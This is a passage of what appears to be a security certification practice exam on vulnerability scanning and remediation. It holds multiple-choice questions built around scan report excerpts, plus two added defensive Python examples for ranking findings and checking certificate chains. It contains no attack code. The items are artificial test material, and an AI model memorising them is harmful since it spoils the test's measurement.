New     Red Hat Update for firefox Security (RHSA-2017:0459)
New     Red Hat Update for openssh Security (RHSA-2017:0641)
New     Red Hat Update for coreutils Security (RHSA-2017:0654)
New     Red Hat Update for glibc Security (RHSA-2017:0680)
New     Red Hat Update for subscription-manager Security (RHSA-2017:0698)
New     Red Hat Update for bash Security (RHSA-2017:0725)
New     Red Hat Update for kernel Security (RHSA-2017:0817)
New     Red Hat Update for curl Security (RHSA-2017:0847)
New     Red Hat Update for gnutls Security (RHSA-2017:0574)
Active  Oracle Java SE Critical Patch Update - October 2016
Active  Oracle Java SE Critical Patch Update - January 2017
Active  Red Hat Update for Firefox Security (RHSA-2017:0190)
Active  Oracle Java SE Critical Patch Update - October 2015
Active  Oracle Java SE Critical Patch Update - January 2016
Active  Oracle Java SE Critical Patch Update - July 2015
Active  Oracle Java SE Critical Patch Update - July 2016
Active  Oracle Java SE Critical Patch Update - April 2016
Active  Red Hat Update for kernel (RHSA-2016:2006)
Active  Red Hat Update for kernel (RHSA-2016:2105) (Dirty Cow)
Active  Red Hat Update for kernel (RHSA-2016:2766)
Active  Red Hat Update for Kernel Security (RHSA-2017:0036)
Active  Red Hat Update for mysql Security (RHSA-2017:0184)
Active  Red Hat Update for Kernel Security (RHSA-2017:0293)
Active  Red Hat Update for libtiff Security (RHSA-2017:0225)
Active  Red Hat Update for ntp security (RHSA-2017:0252)
Active  Red Hat Update for openssl Security (RHSA-2017:0286)
Active  Red Hat Update for Kernel Security (RHSA-2017:0307)
Active  Non-Zero Padding Bytes Observed in Ethernet Packets
Fixed   Red Hat OpenSSL Denial of Service Vulnerability

A. This server requires one or more Linux patches.
B. This server requires one or more Oracle database patches.
C. This server requires one or more Firefox patches.
D. This server requires one or more MySQL patches.



146. Donna is working with a system engineer who wants to remediate vulnerabilities in a
server that he manages. Of the report templates shown here, which would be most useful
to the engineer?

[Report template list: Title, Type, Vulnerability Data]
2008 SANS Top 20 Report                        Host Based
Executive Report                               Host Based
High Severity Report                           Host Based
Payment Card Industry (PCI) Executive Report   Scan Based
Payment Card Industry (PCI) Technical Report   Scan Based
Qualys Patch Report                            Host Based
Qualys Top 20 Report                           Host Based
Technical Report                               Host Based
Unknown Device Report                          Scan Based

A. Qualys Top 20 Report
B. PCI Technical Report
C. Executive Report
D. Technical Report



147. James received the vulnerability report shown here for a server in his organization. What
risks does this vulnerability present?

[Scan report excerpt]
Severity 4: Unauthenticated Access to FTP Server Allowed
First Detected: 07/16/2014 at 20:06:22 (GMT-0400)    Last Detected: 04/05/2017 at 00:05:04 (GMT-0400)
QID: 27210                                   CVSS Base: 7.8
Category: File Transfer Protocol             CVSS Temporal: 7
CVE ID: -                                    CVSS3 Base: -
Vendor Reference: -                          CVSS3 Temporal: -
Bugtraq ID: -                                CVSS Environment:
Service Modified: 10/25/2007                 Asset Group: -
User Modified: -                             Collateral Damage Potential: -
Edited: No                                   Target Distribution: -
PCI Vuln: Yes                                Confidentiality Requirement: -
Ticket State: Open                           Integrity Requirement: -
                                             Availability Requirement: -

A. Unauthorized access to files stored on the server
B. Theft of credentials
C. Eavesdropping on communications
D. All of the above
148. Tom runs a vulnerability scan of the file server shown here.

[Network diagram: the Internet, the File Server, and a DMZ containing the Email Server and
the Web Server]

He receives the vulnerability report shown next. Assuming that the firewall is configured
properly, what action should Tom take immediately?

[Scan report excerpt: Windows 2008 R2 Enterprise Service Pack 1, Vulnerabilities (5); the
CVSS and CVSS3 columns were blank in the screenshot]
Sev 3  Active  Windows Remote Desktop Protocol Weak Encryption Method Allowed, port 3389/tcp
Sev 3  Active  Built-in Guest Account Not Renamed at Windows Target System
Sev 3  Active  Administrator Account's Password Does Not Expire
Sev 2  Active  FIN-ACK Network Device Driver Frame Padding Information Disclosure Vulnerability
Sev 1  Fixed   Non-Zero Padding Bytes Observed in Ethernet Packets

A. Block RDP access to this server from all hosts.
B. Review and secure server accounts.
C. Upgrade encryption on the server.
D. No action is required.


149. Dave is running a vulnerability scan of a client's network for the first time. The client has
never run such a scan and expects to find many results. What security control is likely to
remediate the largest portion of the vulnerabilities discovered in Dave's scan?

A. Input validation
B. Patching
C. Intrusion prevention systems
D. Encryption
150. Matt is working to integrate his organization's network with that of a recently acquired
company. He is concerned that the acquired company's network contains systems with
vulnerabilities that may be exploited and wants to protect his network against compromised
hosts on the new network. Which one of the following controls would be least effective at
reducing the risk from network interconnection?

A. Network segmentation
B. VLAN separation
C. Firewall
D. Proxy server

151. Rhonda is planning to patch a production system to correct a vulnerability detected during
a scan. What process should she follow to correct the vulnerability but minimize the risk
of a system failure?

A. Rhonda should deploy the patch immediately on the production system.
B. Rhonda should wait 60 days to deploy the patch to determine whether bugs are
reported.
C. Rhonda should deploy the patch in a sandbox environment to test it prior to applying
it in production.
D. Rhonda should contact the vendor to determine a safe timeframe for deploying the
patch in production.


152. William is preparing a legal agreement for his organization to purchase services from a
vendor. He would like to document the requirements for system availability, including the
vendor's allowable downtime for patching. What type of agreement should William use to
incorporate this requirement?

A. MOU
B. SLA
C. BPA
D. BIA


153. Given no other information, which one of the following vulnerabilities would you consider
the greatest threat to information confidentiality?

A. HTTP TRACE/TRACK methods enabled
B. SSL Server with SSLv3 enabled vulnerability
C. phpinfo information disclosure vulnerability
D. Web application SQL injection vulnerability

154. Which one of the following mobile device strategies is most likely to result in the
introduction of vulnerable devices to a network?

A. COPE
B. TLS
C. BYOD
D. MDM


155. Kassie discovered the vulnerability shown here on one of the servers running in her
organization. What action should she take?

[Scan report excerpt]
Microsoft Windows Server 2003 Unsupported Installation Detection

Description
The remote host is running Microsoft Windows Server 2003. Support for this operating system by Microsoft ended July 14th, 2015.

A. Decommission this server.
B. Run Windows Update to apply security patches.
C. Require strong encryption for access to this server.
D. No action is required.


156. Morgan recently completed the security analysis of a web browser deployed on systems in
her organization and discovered that it is susceptible to a zero-day integer overflow attack.
Who is in the best position to remediate this vulnerability in a manner that allows continued
use of the browser?

A. Morgan
B. The browser developer
C. The network administrator
D. The domain administrator


157. Jeff's team is preparing to deploy a new database service, and he runs a vulnerability scan
of the test environment. This scan results in the four vulnerability reports shown here. Jeff
is primarily concerned with correcting issues that may lead to a confidentiality breach.
Which vulnerability should Jeff remediate first?

[Scan report excerpt; the CVSS and CVSS3 columns were blank in the screenshot]
Host 1 (NetApp), Vulnerabilities (2):
Sev 3  New     Rational ClearCase Portscan Denial of Service Vulnerability, port 371/tcp
Sev 1  Active  Non-Zero Padding Bytes Observed in Ethernet Packets
Host 2 (Linux 2.4-2.6), Vulnerabilities (3):
Sev 4  Active  Oracle Database TNS Listener Poison Attack Vulnerability, port 1521/tcp
Sev 2  Active  Hidden RPC Services
Sev 2  Active  UDP Constant IP Identification Field Fingerprinting Vulnerability

A. Rational ClearCase Portscan Denial of Service vulnerability
B. Non-Zero Padding Bytes Observed in Ethernet Packets
C. Oracle Database TNS Listener Poison Attack vulnerability
D. Hidden RPC Services
158. Eric is a security consultant and is trying to sell his services to a new client. He would like
to run a vulnerability scan of their network prior to their initial meeting to show the client
the need for added security. What is the most significant problem with this approach?

A. Eric does not know the client's infrastructure design.
B. Eric does not have permission to perform the scan.
C. Eric does not know what operating systems and applications are in use.
D. Eric does not know the IP range of the client's systems.


159. Renee is assessing the exposure of her organization to the denial-of-service vulnerability in
the scan report shown here. She is specifically interested in determining whether an external
attacker would be able to exploit the denial-of-service vulnerability. Which one of the
following sources of information would provide her with the best information to complete
this assessment?

[Scan report excerpt]
Severity 3: MediaWiki Information Disclosure, Denial of Service and Multiple Cross-Site Scripting Vulnerabilities
First Detected: 04/09/2017 at 04:49:37 (GMT-0400)    Last Detected: 04/09/2017 at 04:49:37 (GMT-0400)
QID: 12828                                   CVSS Base: 7.5
Category: CGI                                CVSS Temporal: 5.5
CVE ID: CVE-2013-6451, CVE-2013-6452,        CVSS3 Base: -
  CVE-2013-6453, CVE-2013-6454,              CVSS3 Temporal: -
  CVE-2013-6455, CVE-2013-4570,              CVSS Environment:
  CVE-2013-4571, CVE-2013-6472,              Asset Group: -
  CVE-2013-4574                              Collateral Damage Potential: -
Vendor Reference: MediaWiki                  Target Distribution: -
Bugtraq ID: -                                Confidentiality Requirement: -
Service Modified: 03/03/2014                 Integrity Requirement: -
User Modified: -                             Availability Requirement: -
Edited: No
PCI Vuln: Yes
Ticket State:

THREAT:
MediaWiki is free and open source wiki software developed by Wikimedia. It's used to power wiki web sites such as Wikipedia, Wiktionary and Commons.

Multiple security vulnerabilities have been reported in MediaWiki, which can be exploited to conduct script insertion attacks and disclose potentially sensitive information.

- Certain input containing specially crafted CSS tags is not properly sanitized before being used. This can be exploited to insert arbitrary HTML and script code.
- Certain input containing specially crafted XSL tags within an SVG file is not properly sanitized before being used. This can be exploited to insert arbitrary HTML and script code.
- An error within the "UploadBase::detectScriptInSvg()" method can be exploited to upload SVG files containing arbitrary script code.
- Certain input containing specially crafted CSS tags is not properly sanitized before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site if malicious data is viewed.
- Errors within the log API, enhanced RecentChanges, and user watchlists can be exploited to disclose certain information about deleted pages.
- A cross-site scripting vulnerability in the TimedMediaHandler extension exists due to the way it stored and used HTML for showing videos.
- NULL pointer dereference in php-luasandbox, which could be used for DoS attacks.
- Buffer overflow in php-luasandbox.

Affected Version:
MediaWiki versions prior to 1.19.10, 1.21.4, or 1.22.1.

A. Server logs
B. Firewall rules
C. IDS configuration
D. DLP configuration


160. Mary is trying to determine what systems in her organization should be subject to
vulnerability scanning. She would like to base this decision upon the criticality of the system
to business operations. Where should Mary turn to best find this information?

A. The CEO
B. System names
C. IP addresses
D. Asset inventory


161. Paul ran a vulnerability scan of his vulnerability scanner and received the result shown
here. What is the simplest fix to this issue?

[Scan report excerpt]
Tenable Nessus 6.0.x < 6.6 Multiple Vulnerabilities

Description
According to its version, the Tenable Nessus application installed on the remote host is 6.x prior to 6.6. It is, therefore, affected by multiple vulnerabilities:

- A cross-site scripting (XSS) vulnerability exists due to improper validation of user-supplied input. An authenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user's browser session. (CVE-2016-82012)

- A denial of service vulnerability exists due to an external entity injection (XXE) flaw that is triggered during the parsing of XML data. An authenticated, remote attacker can exploit this, via specially crafted XML data, to exhaust system resources. (CVE-2016-82013)

A. Upgrade Nessus.
B. Remove guest accounts.
C. Implement TLS encryption.
D. Renew the server certificate.


162. Sarah is designing a vulnerability management system for her organization. Her highest
priority is conserving network bandwidth. She does not have the ability to alter the
configuration or applications installed on target systems. What solution would work best in
Sarah's environment to provide vulnerability reports?

A. Agent-based scanning
B. Server-based scanning
C. Passive network monitoring
D. Port scanning
163. Terry is conducting a vulnerability scan when he receives a report that the scan is slowing
down the network for other users. He looks at the performance configuration settings
shown here. Which setting would be most likely to correct the issue?

[Scanner settings screenshot: Advanced]
General Settings
  Enable safe checks (checked)
  Stop scanning hosts that become unresponsive during the scan
  Scan IP addresses in a random order
Performance Options
  Slow down the scan when network congestion is detected
  Use Linux kernel congestion detection
  Network timeout (in seconds): 5
  Max simultaneous checks per host: 5
  Max simultaneous hosts per scan: 30
  Max number of concurrent TCP sessions per host: (blank)
  Max number of concurrent TCP sessions per scan: (blank)

A. Enable safe checks.
B. Stop scanning hosts that become unresponsive during the scan.
C. Scan IP addresses in random order.
D. Max simultaneous hosts per scan.


164. Laura received a vendor security bulletin that describes a zero-day vulnerability in her
organization's main database server. This server is on a private network but is used by
publicly accessible web applications. The vulnerability allows the decryption of
administrative connections to the server. What reasonable action can Laura take to address
this issue as quickly as possible?

A. Apply a vendor patch that resolves the issue.
B. Disable all administrative access to the database server.
C. Require VPN access for remote connections to the database server.
D. Verify that the web applications use strong encryption.
165. Emily discovered the vulnerability shown here on a server running in her organization.
What is the most likely underlying cause for this vulnerability?

[Scan report excerpt]
Severity 4: Microsoft Windows OLE Remote Code Execution Vulnerability (MS16-044)
First Detected: 05/04/2016 at 18:05:17 (GMT-0400)    Last Detected: 04/04/2017 at 22:07:28 (GMT-0400)
QID: 91198                                   CVSS Base: 9.3
Category: Windows                            CVSS Temporal: 6.9
CVE ID: CVE-2016-0153                        CVSS3 Base: 7.8
Vendor Reference: MS16-044                   CVSS3 Temporal: 6.8
Bugtraq ID: -                                CVSS Environment:
Service Modified: 04/12/2016                 Asset Group: -
User Modified: -                             Collateral Damage Potential: -
Edited: No                                   Target Distribution: -
PCI Vuln: Yes                                Confidentiality Requirement: -
Ticket State: Open                           Integrity Requirement:
                                             Availability Requirement:

A. Failure to perform input validation
B. Failure to use strong passwords
C. Failure to encrypt communications
D. Failure to install antimalware software


166. Raul is replacing his organization's existing vulnerability scanner with a new product that
will fulfill that functionality moving forward. As Raul begins to build out the policy, he
notices some conflicts in the scanning settings between different documents. Which one of
the following document sources should Raul give the highest priority when resolving these
conflicts?

A. NIST guidance documents
B. Vendor best practices
C. Corporate policy
D. Configuration settings from the prior system

167. Rex recently ran a vulnerability scan of his organization's network and received the results
shown here. He would like to remediate the server with the highest number of the most serious
vulnerabilities first. Which one of the following servers should be on his highest priority list?

[Dashboard screenshot, Tue 11 April 2017: 31 IP addresses scanned, 31 total assets. "Most
vulnerable hosts" table; cells that were illegible in the screenshot are shown as "?"]
Host (by IP)   Last Scan Date    Total Vulns  Level 5  Level 4  Level 3
10.0.102.58    August 26, 2016   17           1        2        ?
10.0.23.139    August 26, 2016   3            1        2        ?
10.0.16.58     August 26, 2016   19           3        6        5
10.0.26.150    August 26, 2016   8            2        4        1
10.0.80.91     August 26, 2016   8            2        4        ?
10.0.5.179     August 26, 2016   4            1        2        ?
10.0.46.116    August 26, 2016   14           ?        ?        ?   (one tier count of 8 legible)
10.0.46.45     August 26, 2016   12           ?        ?        ?   (one tier count of 4 legible)
10.0.38.156    August 26, 2016   11           ?        ?        ?   (one tier count of 3 legible)
10.0.88.169    August 26, 2016   2            ?        ?        ?   (one tier count of 2 legible)
10.0.69.232    August 26, 2016   5            ?        ?        ?   (one tier count of 2 legible)

A. 10.0.102.58
B. 10.0.16.58
C. 10.0.46.116
D. 10.0.69.232
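
The ranking that questions 141 and 167 ask for can be mechanised over a scan export instead of being read off a screenshot. The Python below is an added example and is not code from the book or from any scanner vendor: FINDINGS and HOST_COUNTS are constructed to mirror the legible rows of the two screenshots, and the pattern-to-remediation mapping in ACTION_RULES is this example's own assumption about which single action clears each finding.

```python
"""Rank scan output by severity tier, the criterion behind questions 141 and 167."""
import re
from collections import defaultdict

# (severity, status, title) rows constructed to mirror the question 141 screenshot (a subset)
FINDINGS = [
    (5, "New", "Mozilla Firefox Multiple Vulnerabilities (MFSA2017-05,MFSA2017-06)"),
    (5, "New", "Adobe Flash Player Remote Code Execution Vulnerability (APSB17-07)"),
    (5, "New", "Mozilla Firefox Integer Overflow Vulnerability (MFSA2017-08)"),
    (5, "New", "Microsoft SMB Server Remote Code Execution Vulnerability (MS17-010)"),
    (5, "New", "Microsoft Cumulative Security Update for Internet Explorer (MS17-006)"),
    (5, "New", "Microsoft Windows Update for Vulnerabilities in Adobe Flash Player in Internet Explorer and Edge (MS17-023)"),
    (4, "New", "Microsoft XML Core Services Information Disclosure Vulnerability (MS17-022)"),
    (4, "New", "Microsoft IIS Server XSS Elevation of Privilege Vulnerability (MS17-016)"),
    (4, "New", "Microsoft Windows Kernel Elevation of Privileges (MS17-017)"),
    (3, "New", "NotePad++ scilexer.dll DLL Hijacking Vulnerability"),
    (3, "New", "Birthday attacks against TLS ciphers with 64bit block size (Sweet32) port 3389/tcp"),
    (5, "Active", "Mozilla Firefox Multiple Vulnerabilities (MFSA2016-94,MFSA2016-95)"),
    (5, "Active", "Mozilla Firefox Multiple Vulnerabilities (MFSA 2015-116 and MFSA 2015-133)"),
    (5, "Active", "Mozilla Firefox and Thunderbird SVG Animation Remote Code Execution Vulnerability (MFSA2016-92)"),
    (5, "Active", "EOL/Obsolete Software: Microsoft VC++ 2005 Detected"),
    (5, "Active", "Adobe Flash Player Remote Code Execution Vulnerability (APSB17-04)"),
    (5, "Active", "EOL/Obsolete Software: Microsoft .NET Framework 4 - 4.5.1 Detected"),
    (4, "Active", "Mozilla Firefox Multiple Vulnerabilities (MFSA 2016-16 to MFSA 2016-38)"),
]

# host -> (Level 5, Level 4, Level 3) counts constructed from the question 167 dashboard
HOST_COUNTS = {
    "10.0.102.58": (1, 2, 3),
    "10.0.16.58": (3, 6, 5),
    "10.0.26.150": (2, 4, 1),
    "10.0.80.91": (2, 4, 0),
    "10.0.69.232": (0, 2, 0),
}

# Title pattern -> the single action that clears the finding (this example's own mapping).
# The Microsoft bulletin rule comes first so that "Windows Update for ... Flash Player in
# Internet Explorer (MS17-023)" is attributed to Windows Update, not to the Flash installer.
ACTION_RULES = [
    (re.compile(r"\bMS\d{2}-\d{3}\b"), "Run Windows Update"),
    (re.compile(r"\bMFSA"), "Install patches for Firefox"),
    (re.compile(r"\bAPSB"), "Install patches for Adobe Flash"),
    (re.compile(r"EOL/Obsolete"), "Remove obsolete software"),
]


def action_for(title):
    """Map a finding title to the remediation action that clears it; unmatched titles are 'Other'."""
    for pattern, action in ACTION_RULES:
        if pattern.search(title):
            return action
    return "Other"


def rank_actions(findings):
    """Return [(action, sev5_cleared, total_cleared, carried_over)] with the action that clears
    the most severity-5 findings first, ties broken by total findings cleared. carried_over
    counts findings whose status is Active, i.e. already present on an earlier scan."""
    sev5 = defaultdict(int)
    total = defaultdict(int)
    carried = defaultdict(int)
    for severity, status, title in findings:
        action = action_for(title)
        total[action] += 1
        if severity == 5:
            sev5[action] += 1
        if status == "Active":
            carried[action] += 1
    ranked = [(a, sev5[a], total[a], carried[a]) for a in total]
    ranked.sort(key=lambda row: (row[1], row[2]), reverse=True)
    return ranked


def rank_hosts(host_counts):
    """Order hosts by Level 5 count, then Level 4, then Level 3 (the question 167 criterion)."""
    return sorted(host_counts, key=lambda host: host_counts[host], reverse=True)


if __name__ == "__main__":
    for action, sev5_count, total_count, carried_over in rank_actions(FINDINGS):
        print(f"{sev5_count:2d} sev-5  {total_count:2d} total  {carried_over:2d} carried over  {action}")
    print("host order:", rank_hosts(HOST_COUNTS))
```

rank_actions puts the action that clears the most severity-5 findings first and rank_hosts orders hosts by their Level 5, Level 4 and Level 3 counts. Counts are only one input to the decision: the SMB remote code execution flaw (MS17-010) is reachable over the network with no user interaction, while the Firefox and Flash flaws need someone to browse from the server, so exploitability can justify ordering a fix ahead of a larger count.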


168. Beth is configuring a vulnerability scanning tool. She recently learned about a privilege
escalation vulnerability that requires the user already have local access to the system. She
would like to ensure that her scanners are able to detect this vulnerability as well as future
similar vulnerabilities. What action can she take that would best improve the scanner's
ability to detect this type of issue?

A. Enable credentialed scanning.
B. Run a manual vulnerability feed update.
C. Increase scanning frequency.
D. Change the organization's risk appetite.

169. Shannon reviewed the vulnerability scan report for a web server and found that it has
multiple SQL injection and cross-site scripting vulnerabilities. What would be the least
difficult way for Shannon to address these issues?

A. Install a web application firewall.
B. Recode the web application to include input validation.
C. Apply security patches to the server operating system.
D. Apply security patches to the web server service.

170. Ron is responsible for distributing vulnerability scan reports to system engineers who will
remediate the vulnerabilities. What would be the most effective and secure way for Ron to
distribute the reports?

A. Ron should configure the reports to generate automatically and provide immediate,
automated notification to administrators of the results.
B. Ron should run the reports manually and send automated notifications after he
reviews them for security purposes.
C. Ron should run the reports on an automated basis and then manually notify
administrators of the results after he reviews them.
D. Ron should run the reports manually and then manually notify administrators of the
results after he reviews them.


171. Karen ran a vulnerability scan of a web server used on her organization's internal network.
She received the report shown here. What circumstances would lead Karen to dismiss this
vulnerability as a false positive?

[Scan report excerpt]
Severity 2: SSL Certificate - Signature Verification Failed Vulnerability
First Detected: 05/11/2013 at 02:00:07 (GMT-0400)    Last Detected: 04/04/2017 at 21:30:12 (GMT-0400)
QID: 38173                                   CVSS Base: 9.4
Category: General remote services            CVSS Temporal: 6.8
CVE ID: -                                    CVSS3 Base: -
Vendor Reference: -                          CVSS3 Temporal: -
Bugtraq ID: -                                CVSS Environment:
Service Modified: 05/22/2009                 Asset Group: -
User Modified: -                             Collateral Damage Potential: -
Edited: No                                   Target Distribution: -
PCI Vuln: Yes                                Confidentiality Requirement: -
Ticket State:                                Integrity Requirement: -
                                             Availability Requirement: -

THREAT:
An SSL Certificate associates an entity (person, organization, host, etc.) with a Public Key. In an SSL connection, the client authenticates the remote server using the server's Certificate and extracts the Public Key in the Certificate to establish the secure connection. The authentication is done by verifying that the public key in the certificate is signed by a trusted third-party Certificate Authority.

If a client is unable to verify the certificate, it can abort communication or prompt the user to continue the communication without authentication.

IMPACT:
By exploiting this vulnerability, man-in-the-middle attacks in tandem with DNS cache poisoning can occur.

Exception:
If the server communicates only with a restricted set of clients who have the server certificate or the trusted CA certificate, then the server or CA certificate may not be available publicly, and the scan will be unable to verify the signature.

SOLUTION:
Please install a server certificate signed by a trusted third-party Certificate Authority.

EXPLOITABILITY:
There is no exploitability information for this vulnerability.

A. The server is running SSLv2.
B. The server is running SSLv3.
C. The server is for internal use only.
D. The server does not contain sensitive information.

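Before accepting a "signature verification failed" finding as a false positive, the owning team should reproduce it rather than take the server's audience on trust: the scanner consults only public trust anchors, so a certificate issued by an internal CA fails for the scanner but verifies once the internal CA bundle is supplied. The Python below is an added example, not code from the book or from Qualys. It assumes the openssl command-line tool is installed, builds a throwaway internal CA and a server certificate issued by it (constructed test material) in a temporary directory, and then runs openssl verify both with and without the internal CA.

```python
"""Reproduce and triage the 'SSL Certificate - Signature Verification Failed' finding offline."""
import subprocess
import tempfile


def _openssl(*args, cwd):
    """Run one openssl CLI command inside cwd; True when it exits 0."""
    result = subprocess.run(["openssl", *args], cwd=cwd, capture_output=True)
    return result.returncode == 0


def build_internal_pki(workdir):
    """Create a throwaway internal CA and a server certificate it issued (constructed test
    material, not a real PKI). Produces ca.key, ca.pem, server.key, server.csr, server.pem."""
    steps = [
        ("req", "-x509", "-newkey", "rsa:2048", "-nodes", "-days", "30",
         "-keyout", "ca.key", "-out", "ca.pem", "-subj", "/CN=Example Internal CA"),
        ("req", "-newkey", "rsa:2048", "-nodes", "-keyout", "server.key",
         "-out", "server.csr", "-subj", "/CN=intranet.example.internal"),
        ("x509", "-req", "-days", "30", "-in", "server.csr", "-CA", "ca.pem",
         "-CAkey", "ca.key", "-CAcreateserial", "-out", "server.pem"),
    ]
    return all(_openssl(*step, cwd=workdir) for step in steps)


def chain_verifies(cert, cafile=None, *, cwd):
    """True if openssl can build a trusted path for cert. Without cafile only the host's
    public trust store is consulted, which is what an external scanner does."""
    args = ["verify"]
    if cafile:
        args += ["-CAfile", cafile]
    return _openssl(*args, cert, cwd=cwd)


def triage_finding(workdir=None):
    """Return (scanner_view, with_internal_ca) for the constructed server certificate.
    (False, True) means the finding is a false positive for clients that trust ca.pem;
    (False, False) means the certificate really is unverifiable and the finding stands."""
    workdir = workdir or tempfile.mkdtemp()
    if not build_internal_pki(workdir):
        raise RuntimeError("openssl is required for this example and failed to run")
    return (chain_verifies("server.pem", cwd=workdir),
            chain_verifies("server.pem", cafile="ca.pem", cwd=workdir))


if __name__ == "__main__":
    scanner_view, with_ca = triage_finding()
    print(f"verifies with public trust only (scanner view): {scanner_view}")
    print(f"verifies with the internal CA bundle supplied:  {with_ca}")
```

triage_finding() returns (False, True) for a certificate issued by an internal CA: the scanner's view fails and verification with ca.pem succeeds, which is the condition the report's Exception paragraph describes. If the second value is also False the chain is genuinely broken (self-signed leaf, expired or missing intermediate) and the finding should stay open regardless of whether the server is internal-only or holds no sensitive data.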
172. Which one of the following vulnerabilities is the most difficult to confirm with an external 
vulnerability scan? 
A. Cross-site scripting 
B. Cross-site request forgery 
C. Blind SQL injection 
D. Unpatched web server 
173. Ann would like to improve her organization's ability to detect and remediate security
vulnerabilities by adopting a continuous monitoring approach. Which one of the following is
not a characteristic of a continuous monitoring program?

A. Analyzing and reporting findings
B. Conducting forensic investigations when a vulnerability is exploited
C. Mitigating the risk associated with findings
D. Transferring the risk associated with a finding to a third party
174. Holly ran a scan of a server in her data center and the most serious result was the
vulnerability shown here. What action is most commonly taken to remediate this
vulnerability?

[Scan report excerpt]
Severity 3: phpinfo Information Disclosure Vulnerability
First Detected: 07/17/2016 at 12:02:41 (GMT-0400)    Last Detected: 04/09/2017 at 17:39:08 (GMT-0400)
QID: 10464                                   CVSS Base: 5
Category: CGI                                CVSS Temporal: 3.8
CVE ID: -                                    CVSS3 Base: -
Vendor Reference: -                          CVSS3 Temporal: -
Bugtraq ID: -                                CVSS Environment:
Service Modified: 06/21/2015                 Asset Group: -
User Modified: -                             Collateral Damage Potential: -
Edited: No                                   Target Distribution: -
PCI Vuln: Yes                                Confidentiality Requirement: -
Ticket State:                                Integrity Requirement: -
                                             Availability Requirement: -

THREAT:
This host has a publicly-accessible PHP file that calls the phpinfo() function (or some other function similar to it).

If a user requests this file (such as via an Internet browser), the user may obtain a page containing sensitive information about the Web server host. The information displayed to the user could include the exact version numbers of various software products (Operating Systems, Web Servers, PHP, XML, MySQL), the values of some environment variables ($PATH, $SYSTEM_ROOT), paths to various programs (cmd.exe), and much more.
To get specific information about the type of data your host displayed, please refer to the "Result" field below.

IMPACT:
By exploiting this vulnerability, any user could obtain very sensitive information about the Web server host. This information may aid in attacks against the host.

A. Remove the file from the server.
B. Edit the file to limit information disclosure.
C. Password protect the file.
D. Limit file access to a specific IP range.


175. Nitesh would like to identify any systems on his network that are not registered with his
asset management system. He looks at the reporting console of his vulnerability scanner
and sees the options shown here. Which of the following report types would be his best
likely starting point?

[Report template list: Title, Type, Vulnerability Data]
2008 SANS Top 20 Report                        Host Based
Executive Report                               Host Based
High Severity Report                           Host Based
Payment Card Industry (PCI) Executive Report   Scan Based
Payment Card Industry (PCI) Technical Report   Scan Based
Qualys Patch Report                            Host Based
Qualys Top 20 Report                           Host Based
Technical Report                               Host Based
Unknown Device Report                          Scan Based

A. Technical Report
B. High Severity Report
C. Qualys Patch Report
D. Unknown Device Report

176. What strategy can be used to immediately report configuration changes to a vulnerability
scanner?

A. Scheduled scans
B. Continuous monitoring
C. Automated remediation
D. Automatic updates

During a recent vulnerability scan, Mark discovered a flaw in an internal web application 
that allows cross-site scripting attacks. He spoke with the manager of the team responsible 
for that application and was informed that he discovered a known vulnerability and the 


manager worked with other leaders and determined that the risk is acceptable and does 
not require remediation. What should Mark do? 


A. Object to the manager’s approach and insist upon remediation. 
B. Mark the vulnerability as a false positive. 
C. Schedule the vulnerability for remediation in six months. 


D. Mark the vulnerability as an exception. 


178. Jacquelyn recently read about a new vulnerability in Apache web servers that allows attackers to execute arbitrary code from a remote location. She verified that her servers have this vulnerability, but this morning's vulnerability scan report shows that the servers are secure. She contacted the vendor and determined that they have released a signature for this vulnerability and it is working properly at other clients. What action can Jacquelyn take that will most likely address the problem efficiently?
A. Add the web servers to the scan.
B. Reboot the vulnerability scanner.
C. Update the vulnerability feed.
D. Wait until tomorrow's scan.

179. Dennis is developing a checklist that will be used by different security teams within his broad organization. What SCAP component can he use to help write the checklist and report results in a standardized fashion?
A. XCCDF
B. CCE
C. CPE
D. CVE
180. Vincent is a security manager for a U.S. federal government agency subject to FISMA. Which one of the following is not a requirement that he must follow for his vulnerability scans to maintain FISMA compliance?
A. Run complete scans on at least a monthly basis.
B. Use tools that facilitate interoperability and automation.
C. Remediate legitimate vulnerabilities.
D. Share information from the vulnerability scanning process.


181. Sharon is designing a new vulnerability scanning system for her organization. She must scan a network that contains hundreds of unmanaged hosts. Which of the following techniques would be most effective at detecting system configuration issues in her environment?
A. Agent-based scanning
B. Credentialed scanning
C. Server-based scanning
D. Passive network monitoring


Questions 182 through 184 refer to the following scenario:

Arlene ran a vulnerability scan of a VPN server used by contractors and employees to gain access to her organization's network. An external scan of the server found the vulnerability shown here.

    SSL Certificate Signed Using Weak Hashing Algorithm

    Description
    The remote service uses an SSL certificate chain that has been signed using a cryptographically weak hashing algorithm. These signature algorithms are known to be vulnerable to collision attacks. An attacker can exploit this to generate another certificate with the same digital signature, allowing an attacker to masquerade as the affected service.

    Note that this plugin reports all SSL certificate chains signed with SHA-1 that expire after January 1, 2017 as vulnerable. This is in accordance with Google's gradual sunsetting of the SHA-1 cryptographic hash algorithm.

    Note that certificates in the chain that are contained in the Nessus CA database have been ignored.

182. Which one of the following hash algorithms would not trigger this vulnerability?
A. MD4
B. MD5
C. SHA-1
D. SHA-256

183. What is the most likely result of failing to correct this vulnerability?
A. All users will be able to access the site.
B. All users will be able to access the site, but some may see an error message.
C. Some users will be unable to access the site.
D. All users will be unable to access the site.
184. How can Josh correct this vulnerability?
A. Reconfigure the VPN server to only use secure hash functions.
B. Request a new certificate.
C. Change the domain name of the server.
D. Implement an intrusion prevention system.

185. After reviewing the results of a vulnerability scan, Bruce discovered that many of the servers in his organization are susceptible to a brute-force SSH attack. He would like to determine what external hosts attempted SSH connections to his servers and is reviewing firewall logs. What TCP port would relevant traffic most likely use?
A. 22
B. 636
C. 1433
D. 1521


186. Terry runs a vulnerability scan of the network devices in his organization and sees the vulnerability report shown here for one of those devices. What action should he take?

    2  SSL Certificate - Subject Common Name Does Not Match Server FQDN   port 443/tcp over SSL   Active
    First Detected: 08/22/2016 at 20:52:54 (GMT-0400)   Last Detected: 04/11/2017 at 09:54:48 (GMT-0400)   Times Detected: 6   Last Fixed: N/A
    QID: 38170
    Category: General remote services
    CVE ID: -
    Vendor Reference: -
    Bugtraq ID: -
    Service Modified: 08/12/2015
    User Modified: -
    Edited: No
    PCI Vuln: No

A. No action is necessary because this is an informational report.
B. Upgrade the version of the certificate.
C. Replace the certificate.
D. Verify that the correct ciphers are being used.


